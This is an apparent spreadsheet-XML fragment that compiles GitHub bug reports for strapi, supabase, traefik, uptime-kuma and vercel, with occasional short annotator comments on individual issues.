    <t>## Bug report  Required System information Launched In: 646 ms Environment: development OS: darwin-arm64 Strapi Version: 5.0.0-beta.8 Node/Yarn Version: yarn/4.0.1 npm/? node/v20.9.0 darwin arm64 Edition: Enterprise Database: sqlite  Describe the bug Sending a query like `?page=1&amp;pageSize=10` instead of `?pagination[page]=1&amp;pagination[pageSize]=10` returns the error: json { "data": null, "error": { "status": 400, "name": "PaginationError", "message": "Invalid pagination attributes. You cannot use page and offset pagination in the same query", "details": {} } }  The error is incorrect and very misleading.  Steps to reproduce the behavior See description of bug above  Expected behavior I would expect one of the following (haven't put too much thought into it): - a validation error saying that page parameters are incorrect and must be in the pagination object OR - for the parameters to work anyway OR - for nothing to happen with pagination; since page and pageSize are not in the pagination object they should be ignored and the defaults should be used</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/20509</t>
  </si>
  <si>
    <t>Relation &lt;&gt; does not exists</t>
  </si>
  <si>
    <t>&lt;!-- Hello Thank you for submitting an issue. Before you start, please make sure your issue is understandable and reproducible. To make your issue readable make sure you use valid Markdown syntax. https://guides.github.com/features/mastering-markdown/ Please ensure you have also read and understand the contributing guide. https://github.com/strapi/strapi/blob/main/CONTRIBUTING.md#reporting-an-issue --&gt; ## Bug report  Required System information &lt;!-- Please ensure you are using the Node LTS version (v18 or v20) --&gt; &lt;!-- Strapi v3 is no longer supported, please update to Strapi v4 --&gt; &lt;!-- If you are reporting a frontend bug please provide error logs after setting STRAPI_ENFORCE_SOURCEMAPS=true in your .env --&gt; &lt;!-- This environment variable makes frontend errors easier to read and trace --&gt; - Node.js version: 20.11.1 - NPM version: 10.2.4 - Strapi version: 4.25.0 - Database: postgres - Operating system: macos m1 chip (app in docker node:20.11.1-alpine3.19) - Is your project Javascript or Typescript: Typescript &lt;!-- Did you know you can run `yarn strapi report` or `npm run strapi report` to get this information easier? --&gt;  Describe the bug Hi all. When I try to click the duplicate entry button in colletion types, I get an Internal Server Error error on the UI admin panel. In this case, the following error is displayed in the log: sh strapi-1 | [2024-06-13 13:52:28.056] error: update "products_by_region_ep_product_links" as "t1" set "product_by_region_order" = (select max(product_by_region_order) + 1 from "products_by_region_ep_product_links" as "t2" where t2.ep_product_id = t1.ep_product_id) where "t1"."product_by_region_id" = $1 - relation "products_by_region_ep_product_links" does not exist strapi-1 | error: update "products_by_region_ep_product_links" as "t1" set "product_by_region_order" = (select max(product_by_region_order) + 1 from "products_by_region_ep_product_links" as "t2" where t2.ep_product_id = t1.ep_product_id) where "t1"."product_by_region_id" = $1 - relation "products_by_region_ep_product_links" does not exist  I looked in the database and there is a created table `products_by_region_ep_product_links`. I also found a ticket that talks about a similar problem: https://github.com/strapi/strapi/issues/17672. I did what was recommended there (cleared the `strapi_database_schema` table) and it didn't help. Looking at the error, you can understand that he has some problems with relation to another collection type.  Steps to reproduce the behavior 1. Go to 'Content manager' 2. Click on 'Open collection type' 3. Select a line and click the duplicate button  Expected behavior The recording was successfully duplicated  Screenshots ![image](https://github.com/strapi/strapi/assets/12433983/1c532c85-fd59-4139-ae99-1c7fe6a18cbc)  Code snippets If applicable, add code samples to help explain your problem.  Additional context Add any other context about the problem here.</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/21367</t>
  </si>
  <si>
    <t>Caching issue media-lib new folder</t>
  </si>
  <si>
    <t>Steps to reproduce: - Start with 0 folders - Upload a few images - Try to move a file from the list view and see there is no sub folder to move to - click creat folder fill and save the form - try to move the same file again - The select is still empty - Refresh the page - do the same operation and the select is now filled correctly</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/21450</t>
  </si>
  <si>
    <t>[BUG] Forgot Password respond with "ok" for non-existent users or blocked users</t>
  </si>
  <si>
    <t>&lt;!-- Hello Thank you for submitting an issue. Before you start, please make sure your issue is understandable and reproducible. To make your issue readable make sure you use valid Markdown syntax. https://guides.github.com/features/mastering-markdown/ Please ensure you have also read and understand the contributing guide. https://github.com/strapi/strapi/blob/main/CONTRIBUTING.md#reporting-an-issue --&gt; ## Bug report  Required System information - Node.js version: v20.0.0 - NPM version:10.2.4 - Strapi version:5.0.0 - Database: - Operating system:MacOs 14.5 - Is your project Javascript or Typescript: &lt;!-- Did you know you can run `yarn strapi report` or `npm run strapi report` to get this information easier? --&gt;  Describe the bug Forgot password always returns ok even for blocked or non-existent users, causing unintended behavior  Expected behavior A clear and concise description of what you expected to happen.  Screenshots &lt;img width="721" alt="image" src="https://github.com/user-attachments/assets/a97158bc-9527-4d5c-9b15-60ba943bfd38"&gt;</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/21534</t>
  </si>
  <si>
    <t>useFetchClient only handles json responses</t>
  </si>
  <si>
    <t>## Bug report  Describe the bug we are migrating several local admin plugins to strapi5 - which is pretty awesome btw, so many great new apis to work with :heart: we want to download a zip file, which is created on the server. obviously zip files cannot be parsed as json - therfore the new `useFetchClient` with its responseInterceptor takes over, and just returns an empty list without any error https://github.com/strapi/strapi/blob/develop/packages/core/admin/admin/src/utils/getFetchClient.ts#L123  Steps to reproduce the behavior 1. use the new useFetchClient 2. return anything than json from a plugin api 3. wonder why you get any empty file  Expected behavior depending on the content-type, return `text()` / `blob()` or `json()`</t>
  </si>
  <si>
    <t>https://github.com/strapi/strapi/issues/23201</t>
  </si>
  <si>
    <t>Users-Permission Admin error when updating a user</t>
  </si>
  <si>
    <t>Node Version v20.18.2  NPM/Yarn/PNPM Version Yarn 1.22.22  Strapi Version 5.11.3  Operating System Linux (Debian/Ubuntu)  Database SQLite  Javascript or Typescript Javascript  Reproduction URL _No response_  Bug Description When updating a user in the admin panel (username, password, ect) and you save an error is shown in the admin console but the data is still updated. Looks like the admin is trying to refetch the data using the Document ID rather than the integer ID  Steps to Reproduce 1. Create an app 2. Create a user for users-permissions 3. Try to update the user's username and save 4. See Error in Admin 5. Check API response and see that the data was properly updated  Expected Behavior Should not throw an error (more specifically it shouldn't be doing any kind of documentID valication on users-permissions since it doesn't use the document Service  Logs shell   Code Snippets _No response_  Media Reproduction video https://www.loom.com/share/df1e50020c394fffa98d17a4dd0474bf?sid=20d6b168-d721-4eab-8f53-7eb4bee58f5f  Additional information _No response_  Confirmation Checklist - [x] I have checked the existing [issues](https://github.com/strapi/strapi/issues) for duplicates. - [x] I agree to follow this project's [Code of Conduct](https://github.com/strapi/strapi/blob/develop/CODE_OF_CONDUCT.md).</t>
  </si>
  <si>
    <t xml:space="preserve">becase the api request was saved , but other bug caused it to crash , steps to reporoduce says , check the api response to see what dtat was saved , it ui bug  </t>
  </si>
  <si>
    <t>https://github.com/supabase/supabase/issues/26882</t>
  </si>
  <si>
    <t>Use additional API keys is not working like in the documentation</t>
  </si>
  <si>
    <t># Bug report - [x] I confirm this is a bug with Supabase, not with my own application. - [x] I confirm I have searched the [Docs](https://docs.supabase.com), GitHub [Discussions](https://github.com/supabase/supabase/discussions), and [Discord](https://discord.supabase.com). ## Describe the bug In this [documentation at additional api keys](https://supabase.com/docs/guides/api/securing-your-api?queryGroups=database-method&amp;database-method=sql&amp;queryGroups=pre-request&amp;pre-request=use-additional-api-key#examples), for the function you have to set definer as the permissions for the function, and in the documentation says to use `current_role` to check if is `anon` or other, but, it will always be `postgres` because that is the user that defined the function ## To Reproduce Follow the steps from the documentation ## Expected behavior To work as described in the docs ## Screenshots Here is the values of the headers, jwt and current role when calling the api with anon and authenticated user js { status: 403, current_role: 'postgres', jwt: null, headers: { 'x-forwarded-path': '/rest/v1/users_info', 'x-forwarded-proto': 'http', accept: 'application/vnd.pgrst.object+json', 'accept-profile': 'public', 'x-forwarded-for': '192.168.65.1', 'x-real-ip': '192.168.65.1', authorization: 'Bearer ', 'x-forwarded-port': '8000', 'x-client-info': 'postgrest-js/1.15.2', 'x-forwarded-host': '127.0.0.1', connection: 'keep-alive', apikey: 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZS1kZW1vIiwicm9sZSI6ImFub24iLCJleHAiOjE5ODM4MTI5OTZ9.CRXP1A7WOeoJeXxjNni43kdQwgnWNReilDMblYTn_I0', 'x-forwarded-prefix': '/rest/v1/', host: ':3000' } }  This is how the function looks like sql CREATE OR REPLACE FUNCTION public.request_security_check() RETURNS void LANGUAGE plpgsql SECURITY DEFINER AS $function$declare api_key text := current_setting('request.headers', true)::json-&gt;&gt;'x-api-key'; is_api_key_registered boolean; begin select true into is_api_key_registered from security.db_api_keys where key = api_key limit 1; if is_api_key_registered is true then return; end if; raise sqlstate '45000' using message = json_build_object( 'message', 'No registered API key found.'), detail = json_build_object( 'status', 403, 'current_role', current_role, 'jwt', current_setting('request.jwt', true)::json, 'headers', current_setting('request.headers', true)::json); end;$function$ ;  ## System information - OS: macOS - Version of supabase-js: 1.15.2 - Version of Node.js: 22.2.0</t>
  </si>
  <si>
    <t>https://github.com/traefik/traefik/issues/11313</t>
  </si>
  <si>
    <t>Middleware of ForwardAuth returns incorrect location header</t>
  </si>
  <si>
    <t>Welcome! - [x] Yes, I've searched similar issues on [GitHub](https://github.com/traefik/traefik/issues) and didn't find any. - [x] Yes, I've searched similar issues on the [Traefik community forum](https://community.traefik.io) and didn't find any.  What did you do? I made an auth server that returns a relative url as the Location header in the response. I'm expecting the relative url will be passed to the downstream and then be resolved by the browser or other clients.  What did you see instead? ForwardAuth middleware resolves the location header and return the resolved url as the location header in the response. While the correct behavior should just return the original location header. https://github.com/traefik/traefik/blob/33c1d700c02ad09ab793673a14674b39d78fe352/pkg/middlewares/auth/forward.go#L193 For example, - Auth server endpoint address: http://forward-auth.server.local:8080/auth - Auth server response Location header: /index.html - Downstream received response Location header: http://forward-auth.server.local:8080/index.html - Expected Location header: /index.html Note, that the location should be resolved at the customer side, like the browser, which should be relative to the original forwarded domain, not the auth server.  What version of Traefik are you using? v3.1.6 I checked the latest code. It seems it's still the same behavior.  What is your environment &amp; configuration? Not related. But can provide if being asked.  If applicable, please paste the log output in DEBUG level _No response_</t>
  </si>
  <si>
    <t xml:space="preserve">not sure </t>
  </si>
  <si>
    <t>description involves server endpoint request and response</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/491</t>
  </si>
  <si>
    <t>Created Incident message incorrect Timezone bug</t>
  </si>
  <si>
    <t>**Is it a duplicate question?** NO **Describe the bug** Created incident message on the Status Page does not show the right time for my Timezone even though the Timezone is set up correctly in my admin dashboard. **Info** Uptime Kuma Version: 1.7.0 Using Docker?: Yes Docker Version: 20.10.3 Browser: Chrome Latest **Screenshots** ![htimezone correct](https://user-images.githubusercontent.com/37554361/134824464-c8b8552f-d537-4b86-9c6d-b425e2e1d19b.png) ![aerror1](https://user-images.githubusercontent.com/37554361/134824465-decf23fc-6e3b-4484-859e-86b6eb61e9e3.png)</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/833</t>
  </si>
  <si>
    <t>[Bug?]: User Data Leaked to Client Without Two Step Auth Token Verified</t>
  </si>
  <si>
    <t xml:space="preserve"> Reproduction steps Input the right username and password but do not input auth-token.  Expected behavior Nothing send back.  Actual Behavior Sending monitor list back, with url in it. &lt;img width="634" alt="2021-10-29 11 48 23" src="https://user-images.githubusercontent.com/25259084/139465445-850d0372-5dc7-434f-a04e-9d743cb84a04.png"&gt;  Uptime-Kuma version 1.9.1 ? current upstream master d4c9431  Have you spent some time to check if this issue has been raised before? - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/1422</t>
  </si>
  <si>
    <t>Race condition in push monitors</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description There is a race condition in the code for push monitors that can cause repeat notifications within the same second or shortly thereafter. (see some background in #922) ![image](https://user-images.githubusercontent.com/1147328/160219491-5d077488-49b8-4a77-99b4-7397873384f3.png) http logs show that the GET calls are generally 60s apart, but because of discrepancies in system time down to the ms level, it can appear that they happen a second apart, even if they're very close together (ie.e 17:58:05.999 to 17:59:06.000)  [25/Mar/2022:17:54:05 -0700] "GET /api/push/xxxx?msg=OK&amp;ping=92.177 HTTP/1.1" "-" "curl/7.74.0" TLSv1.3 TLS_AES_256_GCM_SHA384 200 5567 [25/Mar/2022:17:55:05 -0700] "GET /api/push/xxxx?msg=OK&amp;ping=92.196 HTTP/1.1" "-" "curl/7.74.0" TLSv1.3 TLS_AES_256_GCM_SHA384 200 5567  [25/Mar/2022:17:58:05 -0700] "GET /api/push/xxx?msg=OK&amp;ping=90.552 HTTP/1.1" "-" "curl/7.74.0" TLSv1.3 TLS_AES_256_GCM_SHA384 200 5567 [25/Mar/2022:17:59:06 -0700] "GET /api/push/xxx?msg=OK&amp;ping=91.308 HTTP/1.1" "-" "curl/7.74.0" TLSv1.3 TLS_AES_256_GCM_SHA384 200 5567   Reproduction steps Repro is tricky, but it could be possible by monitoring uptime kuma debug logs and synchronizing to them. Basically, the push URL calls have to happen just shortly after the monitor's calls to `beat()` or `safe_beat()`  Expected behavior Uptime kuma should be robust against very small clock discrepancies  Actual Behavior Get double notifications  Uptime-Kuma Version 1.12.1  Operating System and Arch Docker on Ubuntu 20.04  Browser Firefox  Docker Version Latest  NodeJS Version _No response_  Relevant log output _No response_</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/1802</t>
  </si>
  <si>
    <t>New http monitors add port as empty string</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description Hello- I am attempting to write my own RESTful API for Uptime Kuma and have been poking around the database. I noticed that if I add a new https monitor through the Uptime Kuma gui, the `port` column in the database is added as an empty string. Well in my RESTful API I am going to enforce strict type checking at the API level (both incoming and outgoing data using [pydantic](https://pydantic-docs.helpmanual.io/usage/types/)), so I want to enforce this to be an `INTEGER` only or `NULL`. This is because a port **cannot** be anything other than an `INTEGER`. I noticed that in previous Uptime Kuma builds (months ago), https monitors had the value of `port` as `NULL`, then it was changed somewhere along the way to be empty strings. Now I see [SQLite embraces dynamic type checking](https://www.sqlite.org/flextypegood.html), but am wondering if this was a conscious design decision to make new `port` entries an empty string as opposed to `NULL`. I can make my API handle empty strings as well, but I would prefer making it a strict `NULL` or `INTEGER`. I wanted to check if it was a bug first though. I would argue that if the front end only allows an `INTEGER` to be selected (which is the case), then it is a bug. :) -Joe  Reproduction steps 1. Make a new https monitor. 2. Look in the database and see `port` is an empty string, not `NULL`.  Expected behavior I would expect a monitor without a used `port` to be added as `NULL`.  Actual Behavior It is added as an empty string.  Uptime-Kuma Version 1.16.1  Operating System and Arch MacOS 11.6.6  Browser Chrome Version 102.0.5005.115  Docker Version Docker version 20.10.12, build e91ed5707e  NodeJS Version _No response_  Relevant log output shell Here is the output from my pydantic logs: pydantic.error_wrappers.ValidationError: 1 validation error for Monitor response -&gt; 0 -&gt; port value is not a valid integer (type=type_error.integer) &lt;class 'str'&gt;  </t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/2447</t>
  </si>
  <si>
    <t>Discord notification failing with Docker monitor</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description Using docker monitor in conjunction with discord notifications results in error:  2022-12-21T09:55:44.132Z [MONITOR] ERROR: Cannot send notification to BCS INC Error: Error: AxiosError: Request failed with status code 400 {"embeds":["0"]} at Discord.throwGeneralAxiosError (/app/server/notification-providers/notification-provider.js:38:15) at Discord.send (/app/server/notification-providers/discord.js:116:18) at runMicrotasks (&lt;anonymous&gt;) at processTicksAndRejections (node:internal/process/task_queues:96:5) at async Function.sendNotification (/app/server/model/monitor.js:939:21) at async beat (/app/server/model/monitor.js:615:25) at async Timeout.safeBeat [as _onTimeout] (/app/server/model/monitor.js:658:17)  Most likely cause is `undefined` value for `Failing` variable (which I assume is passed on to the Discord)  2022-12-21T09:55:23.928Z [MONITOR] WARN: Monitor #16 'BOT | Docker': Failing: undefined | Interval: 20 seconds | Type: docker | Down Count: 4 | Resend Interval: 5  Notification when container goes back `UP` works, so this seems to be strictly something with `DOWN` notifications.  Reproduction steps 1) Monitor Docker container with Discord notifications enabled 2) Shut down container 3) Check UptimeKuma logs  Expected behavior A Discord message to pop-up once notify gets triggered  Actual Behavior Errors mentioned above in logs  Uptime-Kuma Version 1.18.5  Operating System and Arch Debian 10  Browser Google Chrome 108.0.5359.124  Docker Version _No response_  NodeJS Version _No response_  Relevant log output _No response_</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/2468</t>
  </si>
  <si>
    <t>"unexpected end of file" error with 1.19.0</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description After upgrading to latest version (1.19.0) I noticed several targets I was monitoring was detected as down with this error: unexpected end of file After downgrading to 1.18.5 everything works fine again!  Reproduction steps Install 1.19.0 and try to monitor this url: http://REDACTED/  Expected behavior monitoring should work  Actual Behavior This will fail on 1.19.0 and is working on previous versions  Uptime-Kuma Version 1.19.0  Operating System and Arch Ubuntu 22.04  Browser Google Chrome  Docker Version _No response_  NodeJS Version _No response_  Relevant log output shell [MONITOR] WARN: Monitor #6 'node 4': Failing: unexpected end of file | Interval: 20 seconds | Type: http | Down Count: 0 | Resend Interval: 0 </t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/2727</t>
  </si>
  <si>
    <t>Discord Webhook Display Empty Service URL (MYSQL/MariaDB Check)</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description _No response_  Reproduction steps 1. Create service (MYSQL/MariaDB) ![image](https://user-images.githubusercontent.com/25010528/217066104-a5c68a3f-6057-4a14-a912-58c5205b0896.png) 2. Create Discord Webhook and setup alert 3. Get down your service  Expected behavior You didn't get any service URL or should get right address (like IP:PORT)  Actual Behavior You get discord embed message with empty (`https://`) **Service URL** ![image](https://user-images.githubusercontent.com/25010528/217065653-03f0374b-c6ef-4ed4-a98d-d578c04770bc.png)  Uptime-Kuma Version 1.19.4  Operating System and Arch &lt;Not Required&gt;  Browser &lt;Not Required&gt;  Docker Version &lt;Not Required&gt;  NodeJS Version &lt;Not Required&gt;  Relevant log output _No response_</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/3520</t>
  </si>
  <si>
    <t>Incorrect accepted_statuscodes via API (using python uptime-kuma-api package) made kuma completely non-functional</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description Passing incorrect input [200] to accepted_statuscodes via the python api package made kuma completely non-functional. The backend should do atleast some validation on fields, before saving monitors.  Reproduction steps Create a Monitor via the Python API using "uptime-kuma-api"  api = UptimeKumaApi(f'https://kuma.example.com') api.login('root', '1234') monitor = api.add_monitor( type=MonitorType.HTTP, name=f'Customer: xy', url='https://something.example.com', interval=60 * 5, maxretries=3, accepted_statuscodes=[200], )   Expected behavior Throwing some sort of error and not saving the incorrect monitor.  Actual Behavior Server crashes directly and on every startup, can not reach Backend or use the API.  Uptime-Kuma Version 1.22.1 with docker alpine  Operating System and Arch Ubuntu 22.04.2 LTS  Browser Firefox 115  Docker Version Docker version 24.0.5  NodeJS Version 16  Relevant log output shell 2023-08-03T07:47:03+02:00 [MONITOR] INFO: Added Monitor: undefined User ID: 1 /app/server/util-server.js:585 const codeRangeSplit = codeRange.split("-").map(string =&gt; parseInt(string)); ^ TypeError: codeRange.split is not a function at exports.checkStatusCode (/app/server/util-server.js:585:42) at validateStatus (/app/server/model/monitor.js:356:36) at settle (/app/node_modules/axios/lib/core/settle.js:14:46) at IncomingMessage.handleStreamEnd (/app/node_modules/axios/lib/adapters/http.js:347:11) at IncomingMessage.emit (node:events:402:35) at endReadableNT (node:internal/streams/readable:1343:12) at processTicksAndRejections (node:internal/process/task_queues:83:21) ==&gt; Performing startup jobs and maintenance tasks ==&gt; Starting application with user 0 group 0 Welcome to Uptime Kuma Your Node.js version: 16 2023-08-03T05:47:03Z [SERVER] INFO: Welcome to Uptime Kuma 2023-08-03T05:47:03Z [SERVER] INFO: Node Env: production 2023-08-03T05:47:03Z [SERVER] INFO: Importing Node libraries 2023-08-03T05:47:03Z [SERVER] INFO: Importing 3rd-party libraries 2023-08-03T05:47:05Z [SERVER] INFO: Creating express and socket.io instance 2023-08-03T05:47:05Z [SERVER] INFO: Server Type: HTTP 2023-08-03T05:47:05Z [SERVER] INFO: Importing this project modules 2023-08-03T05:47:05Z [NOTIFICATION] INFO: Prepare Notification Providers 2023-08-03T05:47:05Z [SERVER] INFO: Version: 1.22.1 2023-08-03T05:47:05Z [DB] INFO: Data Dir: ./data/ 2023-08-03T05:47:05Z [SERVER] INFO: Connecting to the Database 2023-08-03T05:47:05Z [DB] INFO: SQLite config: [ { journal_mode: 'wal' } ] [ { cache_size: -12000 } ] 2023-08-03T05:47:05Z [DB] INFO: SQLite Version: 3.41.1 2023-08-03T05:47:05Z [SERVER] INFO: Connected 2023-08-03T05:47:05Z [DB] INFO: Your database version: 10 2023-08-03T05:47:05Z [DB] INFO: Latest database version: 10 2023-08-03T05:47:05Z [DB] INFO: Database patch not needed 2023-08-03T05:47:05Z [DB] INFO: Database Patch 2.0 Process 2023-08-03T05:47:05Z [SERVER] INFO: Load JWT secret from database. 2023-08-03T07:47:05+02:00 [SERVER] INFO: Adding route 2023-08-03T07:47:05+02:00 [SERVER] INFO: Adding socket handler 2023-08-03T07:47:05+02:00 [SERVER] INFO: Init the server 2023-08-03T07:47:05+02:00 [SERVER] INFO: Listening on 3001 /app/server/util-server.js:585 const codeRangeSplit = codeRange.split("-").map(string =&gt; parseInt(string)); ^ TypeError: codeRange.split is not a function at exports.checkStatusCode (/app/server/util-server.js:585:42) at validateStatus (/app/server/model/monitor.js:356:36) at settle (/app/node_modules/axios/lib/core/settle.js:14:46) at IncomingMessage.handleStreamEnd (/app/node_modules/axios/lib/adapters/http.js:347:11) at IncomingMessage.emit (node:events:402:35) at endReadableNT (node:internal/streams/readable:1343:12) at processTicksAndRejections (node:internal/process/task_queues:83:21) </t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/3712</t>
  </si>
  <si>
    <t>"No certificate" badge is shown for http monitors</t>
  </si>
  <si>
    <t xml:space="preserve">  Please verify that this bug has NOT been raised before. - [X] I checked and didn't find similar issue   Security Policy - [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description _No response_  Reproduction steps 1. Create a monitor with http url 2. Add the monitor to a status page 3. Enable "Show Certificate Expiry" for that status page  Expected behavior No badge is shown for http monitors.  Actual Behavior A red badge with the text "Cert Exp.: No/Bad Certificate" is shown for a monitor with an http address. This looks like there's an error, but it's expected to have no certificate when it's http only.  Uptime-Kuma Version 1.23.1  Operating System and Arch Docker  Browser Firefox  Docker Version _No response_  NodeJS Version _No response_  Relevant log output _No response_</t>
  </si>
  <si>
    <t>https://github.com/louislam/uptime-kuma/issues/5564</t>
  </si>
  <si>
    <t>[BUG] Slack Notifications - [no preview available]</t>
  </si>
  <si>
    <t xml:space="preserve"> I have found these related issues/pull requests N/A   Security Policy - [x] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)  Description Slack Notifications worked as expected in the Uptime Kuma **`1.x.x`** and displayed a notification preview correctly. Now in Uptime Kuma **`2.x.x`**, Slack Notifications do not work as expected and now display **`[no preview available]`**  Reproduction steps Any Uptime Kuma **POST** Request to a Slack webhook causes this issue  Expected behavior Slack is meant to display a brief Notification Preview  Actual Behavior Slack doesn't display a notification preview ![Image](https://github.com/user-attachments/assets/6f00032d-2ef8-4672-a496-b1414c361957)  Uptime-Kuma Version 2.0.0-beta.1  Operating System and Arch Debian 12.9 - ARM64  Browser Safari 18.3 (20620.2.4.11.4)   Deployment Environment - Runtime: Docker 27.5.0 - Database: SQLite - Filesystem used to store the database on: EXT4 on an NVMe - Number of Monitors: 42  Relevant log output shell 2025-01-22T19:41:12+11:00 [MONITOR] ERROR: Cannot send notification to Slack 2025-01-22T19:41:12+11:00 [MONITOR] ERROR: Error: Error: AxiosError: Request failed with status code 400 invalid_attachments at Slack.throwGeneralAxiosError (/app/server/notification-providers/notification-provider.js:69:15) at Slack.send (/app/server/notification-providers/slack.js:172:18) at process.processTicksAndRejections (node:internal/process/task_queues:95:5) at async Monitor.sendNotification (/app/server/model/monitor.js:1343:21) at async beat (/app/server/model/monitor.js:925:21) at async Timeout.safeBeat [as _onTimeout] (/app/server/model/monitor.js:1010:17) </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/13</t>
  </si>
  <si>
    <t>`now domain` doesn't handle authentication errors</t>
  </si>
  <si>
    <t xml:space="preserve">Instead it's showing a stack trace like:  Cannot read property `sort` of undefined </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/110</t>
  </si>
  <si>
    <t>Corrupt data stream due to HTTP/2 (suspected)</t>
  </si>
  <si>
    <t>After quite a few hours of investigation I suspect that multipart/form-data data streams become corrupt (garbled) due to HTTP/2. If I try to a upload a file when using HTTP/2 the first couple of bytes become garbled. If I disable HTTP/2 (chrome --disable-http2) then I am unable to reproduce the issue. I have only been able to reproduce the issue with one specific file on some computers. Not reproducable on all computers that I've tested with. See linked GitHub project for a minimal test project with detailed investigation observations. https://github.com/pqvst/form-test If the culprit is indeed the HTTP/2 stack in _now_ then I would say that this is a pretty critical issue since it means that file uploads aren't guaranteed to work. Perhaps there are other scenarios as well?</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/552</t>
  </si>
  <si>
    <t>`now domain buy` doesn't handle pre-orders</t>
  </si>
  <si>
    <t>Hi! :) I wanted to buy a ".now" domain, currently it's pre-order only and `now` doesn't seem to handle this. Instead it shows: `Buy now for $undefined (&lt;my_email&gt;)?`</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/591</t>
  </si>
  <si>
    <t>now secret add results in an Error</t>
  </si>
  <si>
    <t>It looks like `now secret add` has a limit in terms of the variable name size. Using the command while setting a 30 characters long variable name results in an Error, but no message is provided.</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/631</t>
  </si>
  <si>
    <t>`now-cc add` country selection is Case Sensitive</t>
  </si>
  <si>
    <t>`United States` is ok, but it seems that `united states` is not</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/673</t>
  </si>
  <si>
    <t>now alias ls [alias] does not work on simple aliases</t>
  </si>
  <si>
    <t>## Aliases  $ now alias ls &gt; 4 aliases found [877ms] under sequoia source url age https://auth-pqcfahnogz.now.sh https://sequoia-auth.now.sh 2d https://webapp-bpgcubktqz.now.sh https://sequoia-webapp.now.sh 2d [3 custom rules] https://sequoia-monolith.now.sh 2d [4 custom rules] https://counter-demo.now.sh 16d  ## `now alias ls alias-with-rules`  $ now alias ls counter-demo.now.sh pathname method dest /login * writer-gkdldldejq.now.sh /increment * writer-gkdldldejq.now.sh /logout * writer-gkdldldejq.now.sh * reader-jdaugptkks.now.sh  ## `now alias ls alias-without-rules`  $ now alias ls sequoia-auth.now.sh &gt; Error! Could not match path alias for: sequoia-auth.now.sh  # Expected `now alias ls &lt;alias&gt;` returns info about an alias # Actual `now alias ls &lt;alias&gt;` **fails** if it's a simple url source alias</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/738</t>
  </si>
  <si>
    <t>now buy domains returning `undefined` price</t>
  </si>
  <si>
    <t xml:space="preserve">  ~ git:(master)  now buy domains domain-name.something &gt; The domain "domain-name.something" is available to buy under bukinoshita! [3s] &gt; Buy now for $undefined (undefinedyr)? [y|N] </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/801</t>
  </si>
  <si>
    <t>`now dns add` should return error feedback in case of an error</t>
  </si>
  <si>
    <t>Running:  $ now dns add &lt;DOMAIN&gt; TXT &lt;VALUE&gt;  on `v7.4.0` it returns me `&gt; Error! Invalid number of arguments. See: now dns --help for usage.` but on `v8.0.1` it does not return anything. cc @sergiodxa</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/922</t>
  </si>
  <si>
    <t>now alias ls gives "Could not match path alias for"</t>
  </si>
  <si>
    <t>`now --version` &gt; 8.3.10 `now alias ls my-app-obfuscated.now.sh` **Gives:** &gt; Error! Could not match path alias for: my-app-obfuscated.now.sh **Expected:** List rules for alias **Notes:** `now alias ls` lists my-app-obfuscated.now.sh as an alias for one of the deployments Any help would be appreciated</t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/1337</t>
  </si>
  <si>
    <t>`now alias ls &lt;url&gt; --json` outputting the json to stderr</t>
  </si>
  <si>
    <t xml:space="preserve"> $ now alias ls my-path-alias.now.sh --json &gt; rules.json { "rules": [ &lt;snip&gt; ] } </t>
  </si>
  <si>
    <t>https://github.com/vercel/vercel/issues/1350</t>
  </si>
  <si>
    <t>`now rm` prints misleading error message upon HTTP 500</t>
  </si>
  <si>
